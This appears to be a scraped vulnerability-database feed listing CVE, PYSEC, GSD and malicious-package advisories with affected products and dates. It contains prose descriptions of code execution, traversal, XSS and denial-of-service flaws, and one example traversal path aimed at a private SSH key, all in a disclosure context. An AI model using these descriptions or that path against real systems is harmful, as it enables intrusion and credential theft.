Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
2023-03-14T16:55:55.351Z 2024-07-16T01:08:18.154Z
cve-2023-24908 (NVD) CVSS-v3.1: 8.1 Remote Procedure Call Runtime Remote Code Execution Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 20H2
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2008 Service Pack 2
Windows Server 2008 Service Pack 2 (Server Core installation)
Windows Server 2008 Service Pack 2
Windows Server 2008 R2 Service Pack 1
Windows Server 2008 R2 Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
2023-03-14T16:55:54.345Z 2024-07-16T01:08:17.053Z
cve-2023-24869 (NVD) CVSS-v3.1: 8.1 Remote Procedure Call Runtime Remote Code Execution Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 20H2
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2008 Service Pack 2
Windows Server 2008 Service Pack 2 (Server Core installation)
Windows Server 2008 Service Pack 2
Windows Server 2008 R2 Service Pack 1
Windows Server 2008 R2 Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
2023-03-14T16:55:54.849Z 2024-07-16T01:08:17.606Z
Vulnerability ID CVSS Base Score Description Vendor Product Publish Date Last Update Date
cve-2024-6780 (NVD) N/A Improper permission control in the mobile application (com.android.server.telecom) may lead to user information security risks. TECNO
com.android.server.telecom
2024-07-16T01:51:03.278Z 2024-07-16T01:51:03.278Z
cve-2024-26621 (NVD) N/A mm: huge_memory: don't force huge page alignment on 32 bit Linux
Linux
Linux
Linux
2024-03-02T21:31:49.158Z 2024-05-29T05:19:40.140Z
cve-2023-3495 (NVD) CVSS-v3.1: 7.8 Out-of-bounds Write Vulnerability in Hitachi EH-VIEW (KeypadDesigner) Hitachi
EH-VIEW
2023-08-23T01:32:12.229Z 2024-07-16T01:13:52.317Z
cve-2024-36401 (NVD) Remote Code Execution (RCE) vulnerability in evaluating property name expressions geoserver
geoserver
2024-07-01T15:25:41.873Z 2024-07-15T16:20:22.225Z
cve-2022-24816 (NVD) Improper Control of Generation of Code in jai-ext geosolutions-it
jai-ext
2022-04-13T20:45:17 2024-06-26T16:20:22.918Z
cve-2024-40524 (NVD) N/A Directory Traversal vulnerability in xmind2testcase v.1.5 allows a remote attacker to execute arbitrary code via the webtool\application.py component. n/a
n/a
2024-07-15T00:00:00 2024-07-15T22:17:08.629065
cve-2024-5634 (NVD) CVSS-v4.0: 8.6 Longse model LBH30FE200W cameras, as well as products based on this device, make use of telnet passwords which follow a specific pattern. Once the pattern is known, brute-forcing the password becomes relatively easy.  Additionally, every camera with the same firmware version shares the same password. Longse Technology
Zamel
LBH30FE200W
ZMB-01/C
2024-07-09T10:58:47.153Z 2024-07-15T21:29:00.919Z
cve-2024-4143 (NVD) N/A Certain HP PC products using AMI BIOS – Buffer Overflow HP Inc.
Certain HP PC Products
2024-07-15T21:46:41.838Z 2024-07-15T21:46:41.838Z
cve-2024-40632 (NVD) Linkerd potential access to the shutdown endpoint linkerd
linkerd2
2024-07-15T21:22:57.957Z 2024-07-16T00:14:22.059Z
cve-2024-39340 (NVD) N/A A security vulnerability has been discovered in the handling of OTP keys in the authentication system of Securepoint UTM. This vulnerability allows the bypassing of second-factor verification (when OTP is enabled) in both the administration web interface and the user portal. Affected versions include UTM 11.5 to 12.6.4 and the Reseller Preview version 12.7.0. The issue has been fixed in UTM versions 12.6.5 and 12.7.1. n/a
n/a
2024-07-12T00:00:00 2024-07-15T22:03:55.253223
cve-2024-37820 (NVD) N/A A nil pointer dereference in PingCAP TiDB v8.2.0-alpha-216-gfe5858b allows attackers to crash the application via expression.inferCollation. n/a
n/a
2024-06-25T00:00:00 2024-07-15T22:01:47.323144
cve-2024-37032 (NVD) N/A Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring. n/a
n/a
2024-05-31T00:00:00 2024-07-15T21:43:05.974743
cve-2024-4224 (NVD) N/A TP-Link TL-SG1016DE XSS TP-Link
TL-SG1016DE
2024-07-15T20:34:53.699Z 2024-07-15T20:34:53.699Z
cve-2018-1000040 (NVD) N/A In Artifex MuPDF 1.12.0 and earlier, multiple use of uninitialized value bugs in the PDF parser could allow an attacker to cause a denial of service (crash) or influence program flow via a crafted file. n/a
n/a
2018-05-24T13:00:00 2024-07-15T20:14:33.985028
cve-2018-1000039 (NVD) N/A In Artifex MuPDF 1.12.0 and earlier, multiple heap use after free bugs in the PDF parser could allow an attacker to execute arbitrary code, read memory, or cause a denial of service via a crafted file. n/a
n/a
2018-05-24T13:00:00 2024-07-15T20:16:08.711862
cve-2018-1000038 (NVD) N/A In Artifex MuPDF 1.12.0 and earlier, a stack buffer overflow in function pdf_lookup_cmap_full in pdf/pdf-cmap.c could allow an attacker to execute arbitrary code via a crafted file. n/a
n/a
2018-05-24T13:00:00 2024-07-15T20:28:19.253891
cve-2018-1000037 (NVD) N/A In Artifex MuPDF 1.12.0 and earlier, multiple reachable assertions in the PDF parser allow an attacker to cause a denial of service (assert crash) via a crafted file. n/a
n/a
2018-05-24T13:00:00 2024-07-15T20:17:53.017536
cve-2018-1000036 (NVD) N/A In Artifex MuPDF 1.12.0 and earlier, multiple memory leaks in the PDF parser allow an attacker to cause a denial of service (memory leak) via a crafted file. n/a
n/a
2018-05-24T13:00:00 2024-07-15T20:29:45.289790
cve-2017-7264 (NVD) N/A Use-after-free vulnerability in the fz_subsample_pixmap function in fitz/pixmap.c in Artifex MuPDF 1.10a allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted document. n/a
n/a
2017-03-26T05:47:00 2024-07-15T20:32:04.507514
cve-2024-40630 (NVD) HEIF Heap OOB Read in OpenImageIO AcademySoftwareFoundation
OpenImageIO
2024-07-15T19:15:06.310Z 2024-07-15T19:15:06.310Z
cve-2024-40627 (NVD) OpaMiddleware does not filter HTTP OPTIONS requests busykoala
fastapi-opa
2024-07-15T19:21:40.298Z 2024-07-15T20:13:48.807Z
cve-2024-40624 (NVD) Deserialization of untrusted data in torrentpier/torrentpier torrentpier
torrentpier
2024-07-15T19:28:35.905Z 2024-07-15T19:28:35.905Z
cve-2024-39919 (NVD) Capture screenshot of localhost web services (unauthenticated pages) in @jmondi/url-to-png jasonraimondi
url-to-png
2024-07-15T19:53:23.192Z 2024-07-15T19:53:23.192Z
cve-2024-39918 (NVD) Path Traveral in @jmondi/url-to-png jasonraimondi
url-to-png
2024-07-15T19:53:20.491Z 2024-07-15T19:53:20.491Z
cve-2024-39915 (NVD) Authenticated remote code execution in Thruk sni
Thruk
2024-07-15T19:33:13.649Z 2024-07-15T19:33:13.649Z
cve-2024-39912 (NVD) Enumeration of valid usernames in web-auth/webauthn-lib web-auth
webauthn-framework
2024-07-15T19:38:04.824Z 2024-07-15T19:38:04.824Z
cve-2024-38360 (NVD) Denial of service via Watched Words in Discourse discourse
discourse
2024-07-15T19:43:04.811Z 2024-07-15T19:43:04.811Z
cve-2024-1394 (NVD) CVSS-v3.1: 7.5 Golang-fips/openssl: memory leaks in code encrypting and decrypting rsa payloads Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat Ansible Automation Platform 2.4 for RHEL 8
Red Hat Ansible Automation Platform 2.4 for RHEL 9
Red Hat Developer Tools
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9.2 Extended Update Support
Red Hat OpenShift Container Platform 4.12
Red Hat OpenShift Container Platform 4.12
Red Hat OpenShift Container Platform 4.12
Red Hat OpenShift Container Platform 4.12
Red Hat OpenShift Container Platform 4.12
Red Hat OpenShift Container Platform 4.12
Red Hat OpenShift Container Platform 4.12
Red Hat OpenShift Container Platform 4.12
Red Hat OpenShift Container Platform 4.12
Red Hat OpenShift Container Platform 4.12
Red Hat OpenShift Container Platform 4.13
Red Hat OpenShift Container Platform 4.13
Red Hat OpenShift Container Platform 4.13
Red Hat OpenShift Container Platform 4.13
Red Hat OpenShift Container Platform 4.13
Red Hat OpenShift Container Platform 4.13
Red Hat OpenShift Container Platform 4.13
Red Hat OpenShift Container Platform 4.13
Red Hat OpenShift Container Platform 4.13
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.14
Red Hat OpenShift Container Platform 4.15
Red Hat OpenShift Container Platform 4.15
Red Hat OpenShift Container Platform 4.15
Red Hat OpenShift Container Platform 4.15
Red Hat OpenShift Container Platform 4.15
Red Hat OpenShift Container Platform 4.15
Red Hat OpenShift Container Platform 4.15
Red Hat OpenShift Container Platform 4.15
Red Hat OpenShift Container Platform 4.15
Red Hat OpenShift Container Platform 4.15
Red Hat OpenShift Container Platform 4.15
Red Hat OpenShift Container Platform 4.15
Red Hat OpenStack Platform 16.2
Red Hat OpenStack Platform 17.1 for RHEL 8
Red Hat OpenStack Platform 17.1 for RHEL 9
Red Hat OpenStack Platform 17.1 for RHEL 9
NBDE Tang Server
OpenShift Developer Tools and Services
OpenShift Developer Tools and Services
OpenShift Pipelines
OpenShift Serverless
Red Hat Ansible Automation Platform 1.2
Red Hat Ansible Automation Platform 1.2
Red Hat Ansible Automation Platform 2
Red Hat Certification for Red Hat Enterprise Linux 8
Red Hat Certification for Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
Red Hat OpenShift Container Platform 4
Red Hat OpenShift Container Platform 4
Red Hat OpenShift Container Platform 4
Red Hat OpenShift Container Platform 4
Red Hat OpenShift Container Platform 4
Red Hat OpenShift Container Platform 4
Red Hat OpenShift Container Platform 4
Red Hat Openshift Container Storage 4
Red Hat Openshift Data Foundation 4
Red Hat OpenShift Dev Spaces
Red Hat OpenShift GitOps
Red Hat OpenShift on AWS
Red Hat OpenShift Virtualization 4
Red Hat OpenStack Platform 16.1
Red Hat OpenStack Platform 16.1
Red Hat OpenStack Platform 16.1
Red Hat OpenStack Platform 16.2
Red Hat OpenStack Platform 16.2
Red Hat OpenStack Platform 16.2
Red Hat OpenStack Platform 17.1
Red Hat OpenStack Platform 17.1
Red Hat OpenStack Platform 17.1
Red Hat Service Interconnect 1
Red Hat Service Interconnect 1
Red Hat Service Interconnect 1
Red Hat Software Collections
Red Hat Storage 3
2024-03-21T12:16:38.790Z 2024-07-15T20:07:18.698Z
cve-2023-51103 (NVD) N/A A floating point exception (divide-by-zero) vulnerability was discovered in Artifex MuPDF 1.23.4 in the function fz_new_pixmap_from_float_data() of pixmap.c. n/a
n/a
2023-12-26T00:00:00 2024-07-15T20:09:59.590886
cve-2024-40631 (NVD) Cross-site Scripting (XSS) in media embed element when using custom URL parsers in plate media udecode
plate
2024-07-15T18:21:16.323Z 2024-07-15T18:21:16.323Z
Vulnerability ID Description
pysec-2024-62 Versions of the package langchain-experimental from 0.0.15 and before 0.0.21 are vulnerable to Arbitrary Code Execution when retrieving values from the database, the code will attempt to call 'eval' on all values. An attacker can exploit this vulnerability and execute arbitrary python code if they can control the input prompt and the server is configured with VectorSQLDatabaseChain. **Notes:** Impact on the Confidentiality, Integrity and Availability of the vulnerable component: Confidentiality: Code execution happens within the impacted component, in this case langchain-experimental, so all resources are necessarily accessible. Integrity: There is nothing protected by the impacted component inherently. Although anything returned from the component counts as 'information' for which the trustworthiness can be compromised. Availability: The loss of availability isn't caused by the attack itself, but it happens as a result during the attacker's post-exploitation steps. Impact on the Confidentiality, Integrity and Availability of the subsequent system: As a legitimate low-privileged user of the package (PR:L) the attacker does not have more access to data owned by the package as a result of this vulnerability than they did with normal usage (e.g. can query the DB). The unintended action that one can perform by breaking out of the app environment and exfiltrating files, making remote connections etc. happens during the post exploitation phase in the subsequent system - in this case, the OS. AT:P: An attacker needs to be able to influence the input prompt, whilst the server is configured with the VectorSQLDatabaseChain plugin.
pysec-2024-61 A Stored Cross-Site Scripting (XSS) vulnerability exists in gaizhenbiao/chuanhuchatgpt version 20240410. This vulnerability allows an attacker to inject malicious JavaScript code into the chat history file. When a victim uploads this file, the malicious script is executed in the victim's browser. This can lead to user data theft, session hijacking, malware distribution, and phishing attacks.
pysec-2024-60 A vulnerability was identified in the kjd/idna library, specifically within the `idna.encode()` function, affecting version 3.6. The issue arises from the function's handling of crafted input strings, which can lead to quadratic complexity and consequently, a denial of service condition. This vulnerability is triggered by a crafted input that causes the `idna.encode()` function to process the input with considerable computational load, significantly increasing the processing time in a quadratic manner relative to the input size.
pysec-2024-59 An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. get_supported_language_variant() was subject to a potential denial-of-service attack when used with very long strings containing specific characters.
pysec-2024-58 An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. Derived classes of the django.core.files.storage.Storage base class, when they override generate_filename() without replicating the file-path validations from the parent class, potentially allow directory traversal via certain inputs during a save() call. (Built-in Storage sub-classes are unaffected.)
pysec-2024-57 An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. The django.contrib.auth.backends.ModelBackend.authenticate() method allows remote attackers to enumerate users via a timing attack involving login requests for users with an unusable password.
pysec-2024-56 An issue was discovered in Django 4.2 before 4.2.14 and 5.0 before 5.0.7. urlize and urlizetrunc were subject to a potential denial of service attack via certain inputs with a very large number of brackets.
pysec-2024-54 CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. Zip files uploaded to the server endpoint of `CodeChecker store` are not properly sanitized. An attacker, using a path traversal attack, can load and display files on the machine of `CodeChecker server`. The vulnerable endpoint is `/Default/v6.53/CodeCheckerService@massStoreRun`. The path traversal vulnerability allows reading data on the machine of the `CodeChecker server`, with the same permission level as the `CodeChecker server`. The attack requires a user account on the `CodeChecker server`, with permission to store to a server, and view the stored report. This vulnerability has been patched in version 6.23.
pysec-2023-194 langchain_experimental 0.0.14 allows an attacker to bypass the CVE-2023-36258 fix and execute arbitrary code via the PALChain in the python exec method.
pysec-2024-53 langchain_experimental (aka LangChain Experimental) before 0.0.61 for LangChain provides Python REPL access without an opt-in step. NOTE; this issue exists because of an incomplete fix for CVE-2024-27444.
pysec-2023-243 Missing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.
pysec-2024-52 lepture Authlib before 1.3.1 has algorithm confusion with asymmetric public keys. Unless an algorithm is specified in a jwt.decode call, HMAC verification is allowed with any asymmetric public key. (This is similar to CVE-2022-29217 and CVE-2024-33663.)
pysec-2024-51 A broken access control vulnerability exists in mlflow/mlflow versions before 2.10.1, where low privilege users with only EDIT permissions on an experiment can delete any artifacts. This issue arises due to the lack of proper validation for DELETE requests by users with EDIT permissions, allowing them to perform unauthorized deletions of artifacts. The vulnerability specifically affects the handling of artifact deletions within the application, as demonstrated by the ability of a low privilege user to delete a directory inside an artifact using a DELETE request, despite the official documentation stating that users with EDIT permission can only read and update artifacts, not delete them.
pysec-2024-50 Synapse is an open-source Matrix homeserver. A remote Matrix user with malicious intent, sharing a room with Synapse instances before 1.105.1, can dispatch specially crafted events to exploit a weakness in the V2 state resolution algorithm. This can induce high CPU consumption and accumulate excessive data in the database of such instances, resulting in a denial of service. Servers in private federations, or those that do not federate, are not affected. Server administrators should upgrade to 1.105.1 or later. Some workarounds are available. One can ban the malicious users or ACL block servers from the rooms and/or leave the room and purge the room using the admin API.
pysec-2023-260 A reflected Cross-Site Scripting (XSS) vulnerability exists in the mlflow/mlflow repository, specifically within the handling of the Content-Type header in POST requests. An attacker can inject malicious JavaScript code into the Content-Type header, which is then improperly reflected back to the user without adequate sanitization or escaping, leading to arbitrary JavaScript execution in the context of the victim's browser. The vulnerability is present in the mlflow/server/auth/__init__.py file, where the user-supplied Content-Type header is directly injected into a Python formatted string and returned to the user, facilitating the XSS attack.
pysec-2024-49 Lektor before 3.3.11 does not sanitize DB path traversal. Thus, shell commands might be executed via a file that is added to the templates directory, if the victim's web browser accesses an untrusted website that uses JavaScript to send requests to localhost port 5000, and the web browser is running on the same machine as the "lektor server" command.
pysec-2024-48 Versions of the package black before 24.3.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the lines_with_leading_tabs_expanded function in the strings.py file. An attacker could exploit this vulnerability by crafting a malicious input that causes a denial of service. Exploiting this vulnerability is possible when running Black on untrusted input, or if you habitually put thousands of leading tab characters in your docstrings.
pysec-2024-47 In Django 3.2 before 3.2.25, 4.2 before 4.2.11, and 5.0 before 5.0.3, the django.utils.text.Truncator.words() method (with html=True) and the truncatewords_html template filter are subject to a potential regular expression denial-of-service attack via a crafted string. NOTE: this issue exists because of an incomplete fix for CVE-2019-14232 and CVE-2023-43665.
pysec-2024-46 Apache Airflow, versions 2.8.0 through 2.8.2, has a vulnerability that allows an authenticated user with limited permissions to access resources such as variables, connections, etc from the UI which they do not have permission to access.  Users of Apache Airflow are recommended to upgrade to version 2.8.3 or newer to mitigate the risk associated with this vulnerability
pysec-2024-45 LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution. (A patch is available as of release 0.1.29 of langchain-core.)
pysec-2024-44 In RPyC before 6.0.0, when a server exposes a method that calls the attribute named __array__ for a client-provided netref (e.g., np.array(client_netref)), a remote attacker can craft a class that results in remote code execution.
pysec-2024-43 LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution.
pysec-2024-42 Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated Ops and Viewers users to view all information on audit logs, including dag names and usernames they were not permitted to view. With 2.8.2 and newer, Ops and Viewer users do not have audit log permission by default, they need to be explicitly granted permissions to see the logs. Only admin users have audit log permission by default. Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability
pysec-2023-259 A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability.
pysec-2023-258 A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability.
pysec-2023-257 A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability.
pysec-2023-256 A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability.
pysec-2023-255 Command Injection in GitHub repository gradio-app/gradio prior to main.
pysec-2024-41 diffoscope before 256 allows directory traversal via an embedded filename in a GPG file. Contents of any file, such as ../.ssh/id_rsa, may be disclosed to an attacker. This occurs because the value of the gpg --use-embedded-filenames option is trusted.
pysec-2024-40 orjson.loads in orjson before 3.9.15 does not limit recursion for deeply nested JSON documents.
Vulnerability ID Description
gsd-2024-33903 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33884 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33882 The format of the source doesn't require a description, click on the link for more details
Vulnerability ID Description
mal-2024-1280 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (a17b660a440d2cb884c99312341fc58bf33cac16bb05ecf3065ab4f40c073c4b) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1291 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (6c5e6f0820c8729977d62b9cc34c7461719fd4056fc5e8e9f44426ad3c1f60d7) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1287 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (308d5a6fa5eb0973b0ff8290c321ac60685b686f42543a7a09b16a5fe56a7457) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1295 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (4554cad7be69cbff28d6e2e4d3535b5d7b4158f2efa1c79eaaf705151ec686ff) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1293 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (45e4d71b34d2eb0cd66dc9d19da997d325017d19687f304f39e1138fe0a0f0fa) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1283 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (adbea70f2acb33710c8ecb7e13e55c24980ccd349854aa6c82915d2829359e15) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
